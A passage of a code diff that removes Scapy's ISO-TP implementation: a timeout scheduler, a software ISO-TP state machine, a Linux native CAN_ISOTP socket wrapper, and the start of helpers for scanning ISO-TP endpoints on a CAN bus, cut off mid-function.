# 100 ms of grace time before killing the thread - if TimeoutScheduler.GRACE < now - time_empty: - return - TimeoutScheduler._wait(handle) - TimeoutScheduler._poll() - - finally: - # Worst case scenario: if this thread dies, the next scheduled - # timeout will start a new one - log_runtime.debug("TimeoutScheduler Thread dying @ %f", - TimeoutScheduler._time()) - TimeoutScheduler._thread = None - - @staticmethod - def _poll(): - # type: () -> None - """Execute all the callbacks that were due until now""" - - handles = TimeoutScheduler._handles - handle = None - while 1: - with TimeoutScheduler._mutex: - now = TimeoutScheduler._time() - if len(handles) == 0 or handles[0]._when > now: - # There is nothing to execute yet - return - - # Time complexity is O(log n) - handle = heapq.heappop(handles) - callback = None - if handle is not None: - callback = handle._cb - handle._cb = True - - # Call the callback here, outside of the mutex - if callable(callback): - try: - callback() - except Exception: - traceback.print_exc() - - @staticmethod - def _time(): - # type: () -> float - if six.PY2: - return time.time() - return time.monotonic() - - class Handle: - """Handle for a timeout, consisting of a callback and a time when it - should be executed.""" - __slots__ = ['_when', '_cb'] - - def __init__(self, - when, # type: float - cb # type: Optional[Union[Callable[[], None], bool]] - ): - # type: (...) -> None - self._when = when - self._cb = cb - - def cancel(self): - # type: () -> bool - """Cancels this timeout, preventing it from executing its - callback""" - if self._cb is None: - raise Scapy_Exception("cancel() called on " - "previous canceled Handle") - else: - if isinstance(self._cb, bool): - # Handle was already executed. - # We don't need to cancel anymore - return False - else: - self._cb = None - TimeoutScheduler.cancel(self) - return True - - def __cmp__(self, other): - # type: (Any) -> int - if not isinstance(other, TimeoutScheduler.Handle): - raise TypeError() - diff = self._when - other._when - return 0 if diff == 0 else (1 if diff > 0 else -1) - - def __lt__(self, other): - # type: (Any) -> bool - if not isinstance(other, TimeoutScheduler.Handle): - raise TypeError() - return self._when < other._when - - def __le__(self, other): - # type: (Any) -> bool - if not isinstance(other, TimeoutScheduler.Handle): - raise TypeError() - return self._when <= other._when - - def __gt__(self, other): - # type: (Any) -> bool - if not isinstance(other, TimeoutScheduler.Handle): - raise TypeError() - return self._when > other._when - - def __ge__(self, other): - # type: (Any) -> bool - if not isinstance(other, TimeoutScheduler.Handle): - raise TypeError() - return self._when >= other._when - - -"""ISOTPSoftSocket definitions.""" - -# Enum states -ISOTP_IDLE = 0 -ISOTP_WAIT_FIRST_FC = 1 -ISOTP_WAIT_FC = 2 -ISOTP_WAIT_DATA = 3 -ISOTP_SENDING = 4 - -# /* Flow Status given in FC frame */ -ISOTP_FC_CTS = 0 # /* clear to send */ -ISOTP_FC_WT = 1 # /* wait */ -ISOTP_FC_OVFLW = 2 # /* overflow */ - - -class ISOTPSocketImplementation: - """ - Implementation of an ISOTP "state machine". - - Most of the ISOTP logic was taken from - https://github.com/hartkopp/can-isotp/blob/master/net/can/isotp.c - - This class is separated from ISOTPSoftSocket to make sure the background - thread can't hold a reference to ISOTPSoftSocket, allowing it to be - collected by the GC. - - :param can_socket: a CANSocket instance, preferably filtering only can - frames with identifier equal to did - :param src_id: the CAN identifier of the sent CAN frames - :param dst_id: the CAN identifier of the received CAN frames - :param padding: If True, pads sending packets with 0x00 which not - count to the payload. - Does not affect receiving packets. - :param extended_addr: Extended Address byte to be added at the - beginning of every CAN frame _sent_ by this object. Can be None - in order to disable extended addressing on sent frames. - :param extended_rx_addr: Extended Address byte expected to be found at - the beginning of every CAN frame _received_ by this object. Can - be None in order to disable extended addressing on received - frames. - :param rx_block_size: Block Size byte to be included in every Control - Flow Frame sent by this object. The default value of 0 means - that all the data will be received in a single block. - :param rx_separation_time_min: Time Minimum Separation byte to be - included in every Control Flow Frame sent by this object. The - default value of 0 indicates that the peer will not wait any - time between sending frames. - :param listen_only: Disables send of flow control frames - """ - - def __init__(self, - can_socket, # type: "CANSocket" - src_id, # type: int - dst_id, # type: int - padding=False, # type: bool - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] - rx_block_size=0, # type: int - rx_separation_time_min=0, # type: int - listen_only=False # type: bool - ): - # type: (...) -> None - self.can_socket = can_socket - self.dst_id = dst_id - self.src_id = src_id - self.padding = padding - self.fc_timeout = 1 - self.cf_timeout = 1 - - self.filter_warning_emitted = False - - self.extended_rx_addr = extended_rx_addr - self.ea_hdr = b"" - if extended_addr is not None: - self.ea_hdr = struct.pack("B", extended_addr) - self.listen_only = listen_only - - self.rxfc_bs = rx_block_size - self.rxfc_stmin = rx_separation_time_min - - self.rx_queue = queue.Queue() - self.rx_len = -1 - self.rx_buf = None # type: Optional[bytes] - self.rx_sn = 0 - self.rx_bs = 0 - self.rx_idx = 0 - self.rx_ts = 0.0 # type: Union[float, EDecimal] - self.rx_state = ISOTP_IDLE - - self.txfc_bs = 0 - self.txfc_stmin = 0 - self.tx_gap = 0 - - self.tx_buf = None # type: Optional[bytes] - self.tx_sn = 0 - self.tx_bs = 0 - self.tx_idx = 0 - self.rx_ll_dl = 0 - self.tx_state = ISOTP_IDLE - - self.tx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 - self.rx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 - self.rx_thread = CANReceiverThread(can_socket, self.on_can_recv) - - self.tx_mutex = Lock() - self.rx_mutex = Lock() - self.send_mutex = Lock() - - self.tx_done = Event() - self.tx_exception = None # type: Optional[str] - - self.tx_callbacks = [] # type: List[Callable[[], None]] - self.rx_callbacks = [] # type: List[Callable[[bytes], None]] - - self.rx_thread.start() - - def __del__(self): - # type: () -> None - self.close() - - def can_send(self, load): - # type: (bytes) -> None - if self.padding: - load += b"\xCC" * (CAN_MAX_DLEN - len(load)) - if self.src_id is None or self.src_id <= 0x7ff: - self.can_socket.send(CAN(identifier=self.src_id, data=load)) - else: - self.can_socket.send(CAN(identifier=self.src_id, flags="extended", - data=load)) - - def on_can_recv(self, p): - # type: (Packet) -> None - if not isinstance(p, CAN): - raise Scapy_Exception("argument is not a CAN frame") - if p.identifier != self.dst_id: - if not self.filter_warning_emitted and conf.verb >= 2: - warning("You should put a filter for identifier=%x on your " - "CAN socket", self.dst_id) - self.filter_warning_emitted = True - else: - self.on_recv(p) - - def close(self): - # type: () -> None - self.rx_thread.stop() - - def _rx_timer_handler(self): - # type: () -> None - """Method called every time the rx_timer times out, due to the peer not - sending a consecutive frame within the expected time window""" - - with self.rx_mutex: - if self.rx_state == ISOTP_WAIT_DATA: - # we did not get new data frames in time. - # reset rx state - self.rx_state = ISOTP_IDLE - if conf.verb > 2: - warning("RX state was reset due to timeout") - - def _tx_timer_handler(self): - # type: () -> None - """Method called every time the tx_timer times out, which can happen in - two situations: either a Flow Control frame was not received in time, - or the Separation Time Min is expired and a new frame must be sent.""" - - with self.tx_mutex: - if (self.tx_state == ISOTP_WAIT_FC or - self.tx_state == ISOTP_WAIT_FIRST_FC): - # we did not get any flow control frame in time - # reset tx state - self.tx_state = ISOTP_IDLE - self.tx_exception = "TX state was reset due to timeout" - self.tx_done.set() - raise Scapy_Exception(self.tx_exception) - elif self.tx_state == ISOTP_SENDING: - # push out the next segmented pdu - src_off = len(self.ea_hdr) - max_bytes = 7 - src_off - if self.tx_buf is None: - self.tx_exception = "TX buffer is not filled" - raise Scapy_Exception(self.tx_exception) - - while 1: - load = self.ea_hdr - load += struct.pack("B", N_PCI_CF + self.tx_sn) - load += self.tx_buf[self.tx_idx:self.tx_idx + max_bytes] - self.can_send(load) - - self.tx_sn = (self.tx_sn + 1) % 16 - self.tx_bs += 1 - self.tx_idx += max_bytes - - if len(self.tx_buf) <= self.tx_idx: - # we are done - self.tx_state = ISOTP_IDLE - self.tx_done.set() - for cb in self.tx_callbacks: - cb() - return - - if self.txfc_bs != 0 and self.tx_bs >= self.txfc_bs: - # stop and wait for FC - self.tx_state = ISOTP_WAIT_FC - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.fc_timeout, self._tx_timer_handler) - return - - if self.tx_gap == 0: - continue - else: - # stop and wait for tx gap - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.tx_gap, self._tx_timer_handler) - return - - def on_recv(self, cf): - # type: (Packet) -> None - """Function that must be called every time a CAN frame is received, to - advance the state machine.""" - - data = bytes(cf.data) - - if len(data) < 2: - return - - ae = 0 - if self.extended_rx_addr is not None: - ae = 1 - if len(data) < 3: - return - if six.indexbytes(data, 0) != self.extended_rx_addr: - return - - n_pci = six.indexbytes(data, ae) & 0xf0 - - if n_pci == N_PCI_FC: - with self.tx_mutex: - self._recv_fc(data[ae:]) - elif n_pci == N_PCI_SF: - with self.rx_mutex: - self._recv_sf(data[ae:], cf.time) - elif n_pci == N_PCI_FF: - with self.rx_mutex: - self._recv_ff(data[ae:], cf.time) - elif n_pci == N_PCI_CF: - with self.rx_mutex: - self._recv_cf(data[ae:]) - - def _recv_fc(self, data): - # type: (bytes) -> None - """Process a received 'Flow Control' frame""" - if (self.tx_state != ISOTP_WAIT_FC and - self.tx_state != ISOTP_WAIT_FIRST_FC): - return - - if self.tx_timeout_handle is not None: - self.tx_timeout_handle.cancel() - self.tx_timeout_handle = None - - if len(data) < 3: - self.tx_state = ISOTP_IDLE - self.tx_exception = "CF frame discarded because it was too short" - self.tx_done.set() - raise Scapy_Exception(self.tx_exception) - - # get communication parameters only from the first FC frame - if self.tx_state == ISOTP_WAIT_FIRST_FC: - self.txfc_bs = six.indexbytes(data, 1) - self.txfc_stmin = six.indexbytes(data, 2) - - if ((self.txfc_stmin > 0x7F) and - ((self.txfc_stmin < 0xF1) or (self.txfc_stmin > 0xF9))): - self.txfc_stmin = 0x7F - - if six.indexbytes(data, 2) <= 127: - tx_gap = six.indexbytes(data, 2) / 1000.0 - elif 0xf1 <= six.indexbytes(data, 2) <= 0xf9: - tx_gap = (six.indexbytes(data, 2) & 0x0f) / 10000.0 - else: - tx_gap = 0 - self.tx_gap = tx_gap - - self.tx_state = ISOTP_WAIT_FC - - isotp_fc = six.indexbytes(data, 0) & 0x0f - - if isotp_fc == ISOTP_FC_CTS: - self.tx_bs = 0 - self.tx_state = ISOTP_SENDING - # start cyclic timer for sending CF frame - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.tx_gap, self._tx_timer_handler) - elif isotp_fc == ISOTP_FC_WT: - # start timer to wait for next FC frame - self.tx_state = ISOTP_WAIT_FC - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.fc_timeout, self._tx_timer_handler) - elif isotp_fc == ISOTP_FC_OVFLW: - # overflow in receiver side - self.tx_state = ISOTP_IDLE - self.tx_exception = "Overflow happened at the receiver side" - self.tx_done.set() - raise Scapy_Exception(self.tx_exception) - else: - self.tx_state = ISOTP_IDLE - self.tx_exception = "Unknown FC frame type" - self.tx_done.set() - raise Scapy_Exception(self.tx_exception) - - def _recv_sf(self, data, ts): - # type: (bytes, Union[float, EDecimal]) -> None - """Process a received 'Single Frame' frame""" - if self.rx_timeout_handle is not None: - self.rx_timeout_handle.cancel() - self.rx_timeout_handle = None - - if self.rx_state != ISOTP_IDLE: - if conf.verb > 2: - warning("RX state was reset because single frame was received") - self.rx_state = ISOTP_IDLE - - length = six.indexbytes(data, 0) & 0xf - if len(data) - 1 < length: - return - - msg = data[1:1 + length] - self.rx_queue.put((msg, ts)) - for cb in self.rx_callbacks: - cb(msg) - - def _recv_ff(self, data, ts): - # type: (bytes, Union[float, EDecimal]) -> None - """Process a received 'First Frame' frame""" - if self.rx_timeout_handle is not None: - self.rx_timeout_handle.cancel() - self.rx_timeout_handle = None - - if self.rx_state != ISOTP_IDLE: - if conf.verb > 2: - warning("RX state was reset because first frame was received") - self.rx_state = ISOTP_IDLE - - if len(data) < 7: - return - self.rx_ll_dl = len(data) - - # get the FF_DL - self.rx_len = (six.indexbytes(data, 0) & 0x0f) * 256 + six.indexbytes( - data, 1) - ff_pci_sz = 2 - - # Check for FF_DL escape sequence supporting 32 bit PDU length - if self.rx_len == 0: - # FF_DL = 0 => get real length from next 4 bytes - self.rx_len = six.indexbytes(data, 2) << 24 - self.rx_len += six.indexbytes(data, 3) << 16 - self.rx_len += six.indexbytes(data, 4) << 8 - self.rx_len += six.indexbytes(data, 5) - ff_pci_sz = 6 - - # copy the first received data bytes - data_bytes = data[ff_pci_sz:] - self.rx_idx = len(data_bytes) - self.rx_buf = data_bytes - self.rx_ts = ts - - # initial setup for this pdu reception - self.rx_sn = 1 - self.rx_state = ISOTP_WAIT_DATA - - # no creation of flow control frames - if not self.listen_only: - # send our first FC frame - load = self.ea_hdr - load += struct.pack("BBB", N_PCI_FC, self.rxfc_bs, self.rxfc_stmin) - self.can_send(load) - - # wait for a CF - self.rx_bs = 0 - self.rx_timeout_handle = TimeoutScheduler.schedule( - self.cf_timeout, self._rx_timer_handler) - - def _recv_cf(self, data): - # type: (bytes) -> None - """Process a received 'Consecutive Frame' frame""" - if self.rx_state != ISOTP_WAIT_DATA: - return - - if self.rx_timeout_handle is not None: - self.rx_timeout_handle.cancel() - self.rx_timeout_handle = None - - # CFs are never longer than the FF - if len(data) > self.rx_ll_dl: - return - - # CFs have usually the LL_DL length - if len(data) < self.rx_ll_dl: - # this is only allowed for the last CF - if self.rx_len - self.rx_idx > self.rx_ll_dl: - if conf.verb > 2: - warning("Received a CF with insufficient length") - return - - if six.indexbytes(data, 0) & 0x0f != self.rx_sn: - # Wrong sequence number - if conf.verb > 2: - warning("RX state was reset because wrong sequence number was " - "received") - self.rx_state = ISOTP_IDLE - return - - if self.rx_buf is None: - raise Scapy_Exception("rx_buf not filled with data!") - - self.rx_sn = (self.rx_sn + 1) % 16 - self.rx_buf += data[1:] - self.rx_idx = len(self.rx_buf) - - if self.rx_idx >= self.rx_len: - # we are done - self.rx_buf = self.rx_buf[0:self.rx_len] - self.rx_state = ISOTP_IDLE - self.rx_queue.put((self.rx_buf, self.rx_ts)) - for cb in self.rx_callbacks: - cb(self.rx_buf) - self.rx_buf = None - return - - # perform blocksize handling, if enabled - if self.rxfc_bs != 0: - self.rx_bs += 1 - - # check if we reached the end of the block - if self.rx_bs >= self.rxfc_bs and not self.listen_only: - # send our FC frame - load = self.ea_hdr - load += struct.pack("BBB", N_PCI_FC, self.rxfc_bs, - self.rxfc_stmin) - self.can_send(load) - - # wait for another CF - self.rx_timeout_handle = TimeoutScheduler.schedule( - self.cf_timeout, self._rx_timer_handler) - - def begin_send(self, x): - # type: (bytes) -> None - """Begins sending an ISOTP message. This method does not block.""" - with self.tx_mutex: - if self.tx_state != ISOTP_IDLE: - raise Scapy_Exception("Socket is already sending, retry later") - - self.tx_done.clear() - self.tx_exception = None - self.tx_state = ISOTP_SENDING - - length = len(x) - if length > ISOTP_MAX_DLEN_2015: - raise Scapy_Exception("Too much data for ISOTP message") - - if len(self.ea_hdr) + length <= 7: - # send a single frame - data = self.ea_hdr - data += struct.pack("B", length) - data += x - self.tx_state = ISOTP_IDLE - self.can_send(data) - self.tx_done.set() - for cb in self.tx_callbacks: - cb() - return - - # send the first frame - data = self.ea_hdr - if length > ISOTP_MAX_DLEN: - data += struct.pack(">HI", 0x1000, length) - else: - data += struct.pack(">H", 0x1000 | length) - load = x[0:8 - len(data)] - data += load - self.can_send(data) - - self.tx_buf = x - self.tx_sn = 1 - self.tx_bs = 0 - self.tx_idx = len(load) - - self.tx_state = ISOTP_WAIT_FIRST_FC - self.tx_timeout_handle = TimeoutScheduler.schedule( - self.fc_timeout, self._tx_timer_handler) - - def send(self, p): - # type: (bytes) -> None - """Send an ISOTP frame and block until the message is sent or an error - happens.""" - with self.send_mutex: - self.begin_send(p) - - # Wait until the tx callback is called - send_done = self.tx_done.wait(30) - if self.tx_exception is not None: - raise Scapy_Exception(self.tx_exception) - if not send_done: - raise Scapy_Exception("ISOTP send not completed in 30s") - return - - def recv(self, timeout=None): - # type: (Optional[int]) -> Optional[Tuple[bytes, Union[float, EDecimal]]] # noqa: E501 - """Receive an ISOTP frame, blocking if none is available in the buffer - for at most 'timeout' seconds.""" - - try: - return self.rx_queue.get(timeout is None or timeout > 0, timeout) - except queue.Empty: - return None - - -if six.PY3 and LINUX: - - from scapy.arch.linux import get_last_packet_timestamp, SIOCGIFINDEX - - """ISOTPNativeSocket definitions:""" - - CAN_ISOTP = 6 # ISO 15765-2 Transport Protocol - - SOL_CAN_BASE = 100 # from can.h - SOL_CAN_ISOTP = SOL_CAN_BASE + CAN_ISOTP - # /* for socket options affecting the socket (not the global system) */ - CAN_ISOTP_OPTS = 1 # /* pass struct can_isotp_options */ - CAN_ISOTP_RECV_FC = 2 # /* pass struct can_isotp_fc_options */ - - # /* sockopts to force stmin timer values for protocol regression tests */ - CAN_ISOTP_TX_STMIN = 3 # /* pass __u32 value in nano secs */ - CAN_ISOTP_RX_STMIN = 4 # /* pass __u32 value in nano secs */ - CAN_ISOTP_LL_OPTS = 5 # /* pass struct can_isotp_ll_options */ - - CAN_ISOTP_LISTEN_MODE = 0x001 # /* listen only (do not send FC) */ - CAN_ISOTP_EXTEND_ADDR = 0x002 # /* enable extended addressing */ - CAN_ISOTP_TX_PADDING = 0x004 # /* enable CAN frame padding tx path */ - CAN_ISOTP_RX_PADDING = 0x008 # /* enable CAN frame padding rx path */ - CAN_ISOTP_CHK_PAD_LEN = 0x010 # /* check received CAN frame padding */ - CAN_ISOTP_CHK_PAD_DATA = 0x020 # /* check received CAN frame padding */ - CAN_ISOTP_HALF_DUPLEX = 0x040 # /* half duplex error state handling */ - CAN_ISOTP_FORCE_TXSTMIN = 0x080 # /* ignore stmin from received FC */ - CAN_ISOTP_FORCE_RXSTMIN = 0x100 # /* ignore CFs depending on rx stmin */ - CAN_ISOTP_RX_EXT_ADDR = 0x200 # /* different rx extended addressing */ - - # /* default values */ - CAN_ISOTP_DEFAULT_FLAGS = 0 - CAN_ISOTP_DEFAULT_EXT_ADDRESS = 0x00 - CAN_ISOTP_DEFAULT_PAD_CONTENT = 0xCC # /* prevent bit-stuffing */ - CAN_ISOTP_DEFAULT_FRAME_TXTIME = 0 - CAN_ISOTP_DEFAULT_RECV_BS = 0 - CAN_ISOTP_DEFAULT_RECV_STMIN = 0x00 - CAN_ISOTP_DEFAULT_RECV_WFTMAX = 0 - CAN_ISOTP_DEFAULT_LL_MTU = CAN_MTU - CAN_ISOTP_DEFAULT_LL_TX_DL = CAN_MAX_DLEN - CAN_ISOTP_DEFAULT_LL_TX_FLAGS = 0 - - class SOCKADDR(ctypes.Structure): - # See /usr/include/i386-linux-gnu/bits/socket.h for original struct - _fields_ = [("sa_family", ctypes.c_uint16), - ("sa_data", ctypes.c_char * 14)] - - class TP(ctypes.Structure): - # This struct is only used within the SOCKADDR_CAN struct - _fields_ = [("rx_id", ctypes.c_uint32), - ("tx_id", ctypes.c_uint32)] - - class ADDR_INFO(ctypes.Union): - # This struct is only used within the SOCKADDR_CAN struct - # This union is to future proof for future can address information - _fields_ = [("tp", TP)] - - class SOCKADDR_CAN(ctypes.Structure): - # See /usr/include/linux/can.h for original struct - _fields_ = [("can_family", ctypes.c_uint16), - ("can_ifindex", ctypes.c_int), - ("can_addr", ADDR_INFO)] - - class IFREQ(ctypes.Structure): - # The two fields in this struct were originally unions. - # See /usr/include/net/if.h for original struct - _fields_ = [("ifr_name", ctypes.c_char * 16), - ("ifr_ifindex", ctypes.c_int)] - - class ISOTPNativeSocket(SuperSocket): - desc = "read/write packets at a given CAN interface using CAN_ISOTP " \ - "socket " - can_isotp_options_fmt = "@2I4B" - can_isotp_fc_options_fmt = "@3B" - can_isotp_ll_options_fmt = "@3B" - sockaddr_can_fmt = "@H3I" - auxdata_available = True - - def __build_can_isotp_options( - self, - flags=CAN_ISOTP_DEFAULT_FLAGS, - frame_txtime=CAN_ISOTP_DEFAULT_FRAME_TXTIME, - ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS, - txpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, - rxpad_content=CAN_ISOTP_DEFAULT_PAD_CONTENT, - rx_ext_address=CAN_ISOTP_DEFAULT_EXT_ADDRESS): - # type: (int, int, int, int, int, int) -> bytes - return struct.pack(self.can_isotp_options_fmt, - flags, - frame_txtime, - ext_address, - txpad_content, - rxpad_content, - rx_ext_address) - - # == Must use native not standard types for packing == - # struct can_isotp_options { - # __u32 flags; /* set flags for isotp behaviour. */ - # /* __u32 value : flags see below */ - # - # __u32 frame_txtime; /* frame transmission time (N_As/N_Ar) */ - # /* __u32 value : time in nano secs */ - # - # __u8 ext_address; /* set address for extended addressing */ - # /* __u8 value : extended address */ - # - # __u8 txpad_content; /* set content of padding byte (tx) */ - # /* __u8 value : content on tx path */ - # - # __u8 rxpad_content; /* set content of padding byte (rx) */ - # /* __u8 value : content on rx path */ - # - # __u8 rx_ext_address; /* set address for extended addressing */ - # /* __u8 value : extended address (rx) */ - # }; - - def __build_can_isotp_fc_options(self, - bs=CAN_ISOTP_DEFAULT_RECV_BS, - stmin=CAN_ISOTP_DEFAULT_RECV_STMIN, - wftmax=CAN_ISOTP_DEFAULT_RECV_WFTMAX): - # type: (int, int, int) -> bytes - return struct.pack(self.can_isotp_fc_options_fmt, - bs, - stmin, - wftmax) - - # == Must use native not standard types for packing == - # struct can_isotp_fc_options { - # - # __u8 bs; /* blocksize provided in FC frame */ - # /* __u8 value : blocksize. 0 = off */ - # - # __u8 stmin; /* separation time provided in FC frame */ - # /* __u8 value : */ - # /* 0x00 - 0x7F : 0 - 127 ms */ - # /* 0x80 - 0xF0 : reserved */ - # /* 0xF1 - 0xF9 : 100 us - 900 us */ - # /* 0xFA - 0xFF : reserved */ - # - # __u8 wftmax; /* max. number of wait frame transmiss. */ - # /* __u8 value : 0 = omit FC N_PDU WT */ - # }; - - def __build_can_isotp_ll_options(self, - mtu=CAN_ISOTP_DEFAULT_LL_MTU, - tx_dl=CAN_ISOTP_DEFAULT_LL_TX_DL, - tx_flags=CAN_ISOTP_DEFAULT_LL_TX_FLAGS - ): - # type: (int, int, int) -> bytes - return struct.pack(self.can_isotp_ll_options_fmt, - mtu, - tx_dl, - tx_flags) - - # == Must use native not standard types for packing == - # struct can_isotp_ll_options { - # - # __u8 mtu; /* generated & accepted CAN frame type */ - # /* __u8 value : */ - # /* CAN_MTU (16) -> standard CAN 2.0 */ - # /* CANFD_MTU (72) -> CAN FD frame */ - # - # __u8 tx_dl; /* tx link layer data length in bytes */ - # /* (configured maximum payload length) */ - # /* __u8 value : 8,12,16,20,24,32,48,64 */ - # /* => rx path supports all LL_DL values */ - # - # __u8 tx_flags; /* set into struct canfd_frame.flags */ - # /* at frame creation: e.g. CANFD_BRS */ - # /* Obsolete when the BRS flag is fixed */ - # /* by the CAN netdriver configuration */ - # }; - - def __get_sock_ifreq(self, sock, iface): - # type: (socket.socket, str) -> IFREQ - socket_id = ctypes.c_int(sock.fileno()) - ifr = IFREQ() - ifr.ifr_name = iface.encode('ascii') - ret = LIBC.ioctl(socket_id, SIOCGIFINDEX, ctypes.byref(ifr)) - - if ret < 0: - m = u'Failure while getting "{}" interface index.'.format( - iface) - raise Scapy_Exception(m) - return ifr - - def __bind_socket(self, sock, iface, sid, did): - # type: (socket.socket, str, int, int) -> None - socket_id = ctypes.c_int(sock.fileno()) - ifr = self.__get_sock_ifreq(sock, iface) - - if sid > 0x7ff: - sid = sid | socket.CAN_EFF_FLAG - if did > 0x7ff: - did = did | socket.CAN_EFF_FLAG - - # select the CAN interface and bind the socket to it - addr = SOCKADDR_CAN(ctypes.c_uint16(socket.PF_CAN), - ifr.ifr_ifindex, - ADDR_INFO(TP(ctypes.c_uint32(did), - ctypes.c_uint32(sid)))) - - error = LIBC.bind(socket_id, ctypes.byref(addr), - ctypes.sizeof(addr)) - - if error < 0: - warning("Couldn't bind socket") - - def __set_option_flags(self, - sock, # type: socket.socket - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] - listen_only=False, # type: bool - padding=False, # type: bool - transmit_time=100 # type: int - ): - # type: (...) -> None - option_flags = CAN_ISOTP_DEFAULT_FLAGS - if extended_addr is not None: - option_flags = option_flags | CAN_ISOTP_EXTEND_ADDR - else: - extended_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS - - if extended_rx_addr is not None: - option_flags = option_flags | CAN_ISOTP_RX_EXT_ADDR - else: - extended_rx_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS - - if listen_only: - option_flags = option_flags | CAN_ISOTP_LISTEN_MODE - - if padding: - option_flags = option_flags | CAN_ISOTP_TX_PADDING | CAN_ISOTP_RX_PADDING # noqa: E501 - - sock.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_OPTS, - self.__build_can_isotp_options( - frame_txtime=transmit_time, - flags=option_flags, - ext_address=extended_addr, - rx_ext_address=extended_rx_addr)) - - def __init__(self, - iface=None, # type: Optional[Union[str, SuperSocket]] - sid=0, # type: int - did=0, # type: int - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] - listen_only=False, # type: bool - padding=False, # type: bool - transmit_time=100, # type: int - basecls=ISOTP # type: Type[Packet] - ): - # type: (...) -> None - - if not isinstance(iface, six.string_types): - # This is for interoperability with ISOTPSoftSockets. - # If a NativeCANSocket is provided, the interface name of this - # socket is extracted and an ISOTPNativeSocket will be opened - # on this interface. - iface = cast(SuperSocket, iface) - if hasattr(iface, "ins") and hasattr(iface.ins, "getsockname"): - iface = iface.ins.getsockname() - if isinstance(iface, tuple): - iface = cast(str, iface[0]) - else: - raise Scapy_Exception("Provide a string or a CANSocket " - "object as iface parameter") - - self.iface = cast(str, iface) or conf.contribs['NativeCANSocket']['iface'] # noqa: E501 - self.can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, - CAN_ISOTP) - self.__set_option_flags(self.can_socket, - extended_addr, - extended_rx_addr, - listen_only, - padding, - transmit_time) - - self.src = sid - self.dst = did - self.exsrc = extended_addr - self.exdst = extended_rx_addr - - self.can_socket.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_RECV_FC, - self.__build_can_isotp_fc_options()) - self.can_socket.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_LL_OPTS, - self.__build_can_isotp_ll_options()) - self.can_socket.setsockopt( - socket.SOL_SOCKET, - SO_TIMESTAMPNS, - 1 - ) - - self.__bind_socket(self.can_socket, self.iface, sid, did) - self.ins = self.can_socket - self.outs = self.can_socket - if basecls is None: - warning('Provide a basecls ') - self.basecls = basecls - - def recv_raw(self, x=0xffff): - # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 - """ - Receives a packet, then returns a tuple containing - (cls, pkt_data, time) - """ - try: - pkt, _, ts = self._recv_raw(self.ins, x) - except BlockingIOError: # noqa: F821 - warning('Captured no data, socket in non-blocking mode.') - return None, None, None - except socket.timeout: - warning('Captured no data, socket read timed out.') - return None, None, None - except OSError: - # something bad happened (e.g. the interface went down) - warning("Captured no data.") - self.close() - return None, None, None - - if ts is None: - ts = get_last_packet_timestamp(self.ins) - return self.basecls, pkt, ts - - def recv(self, x=0xffff): - # type: (int) -> Optional[Packet] - msg = SuperSocket.recv(self, x) - if msg is None: - return msg - - if hasattr(msg, "src"): - msg.src = self.src - if hasattr(msg, "dst"): - msg.dst = self.dst - if hasattr(msg, "exsrc"): - msg.exsrc = self.exsrc - if hasattr(msg, "exdst"): - msg.exdst = self.exdst - return msg - - -if USE_CAN_ISOTP_KERNEL_MODULE: - ISOTPSocket = ISOTPNativeSocket - __all__.append("ISOTPNativeSocket") - - -# ################################################################### -# #################### ISOTPSCAN #################################### -# ################################################################### -def send_multiple_ext(sock, ext_id, packet, number_of_packets): - # type: (SuperSocket, int, Packet, int) -> None - """Send multiple packets with extended addresses at once. - - This function is used for scanning with extended addresses. - It sends multiple packets at once. The number of packets - is defined in the number_of_packets variable. - It only iterates the extended ID, NOT the actual CAN ID of the packet. - This method is used in extended scan function. - - :param sock: CAN interface to send packets - :param ext_id: Extended ISOTP-Address - :param packet: Template Packet - :param number_of_packets: number of packets to send in one batch - """ - end_id = min(ext_id + number_of_packets, 255) - for i in range(ext_id, end_id + 1): - packet.extended_address = i - sock.send(packet) - - -def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): - # type: (int, bool, bool) -> Packet - """Craft ISO-TP packet - - :param identifier: identifier of crafted packet - :param extended: boolean if packet uses extended address - :param extended_can_id: boolean if CAN should use extended Ids - :return: Crafted Packet - """ - - if extended: - pkt = ISOTPHeaderEA() / ISOTP_FF() - pkt.extended_address = 0 - pkt.data = b'\x00\x00\x00\x00\x00' - else: - pkt = ISOTPHeader() / ISOTP_FF() - pkt.data = b'\x00\x00\x00\x00\x00\x00' - if extended_can_id: - pkt.flags = "extended" - - pkt.identifier = identifier - pkt.message_size = 100 - return pkt - - -def filter_periodic_packets(packet_dict, verbose=False): - # type: (Dict[int, Tuple[Packet, int]], bool) -> None - """Filter to remove periodic packets from packet_dict - - ISOTP-Filter for periodic packets (same ID, always same time-gaps) - Deletes periodic packets in packet_dict - - :param packet_dict: Dictionary, where the filter is applied - :param verbose: Displays further information - """ - filter_dict = {} # type: Dict[int, Tuple[List[int], List[Packet]]] - - for key, value in packet_dict.items(): - pkt = value[0] - idn = value[1] - if idn not in filter_dict: - filter_dict[idn] = ([key], [pkt]) - else: - key_lst, pkt_lst = filter_dict[idn] - filter_dict[idn] = (key_lst + [key], pkt_lst + [pkt]) - - for idn in filter_dict: - key_lst = filter_dict[idn][0] - pkt_lst = filter_dict[idn][1] - if len(pkt_lst) < 3: - continue - - tg = [float(p1.time) - float(p2.time) - for p1, p2 in zip(pkt_lst[1:], pkt_lst[:-1])] - if all(abs(t1 - t2) < 0.001 for t1, t2 in zip(tg[1:], tg[:-1])): - if verbose: - print("[i] Identifier 0x%03x seems to be periodic. " - "Filtered.") - for k in key_lst: - del packet_dict[k] - - -def get_isotp_fc( - id_value, # 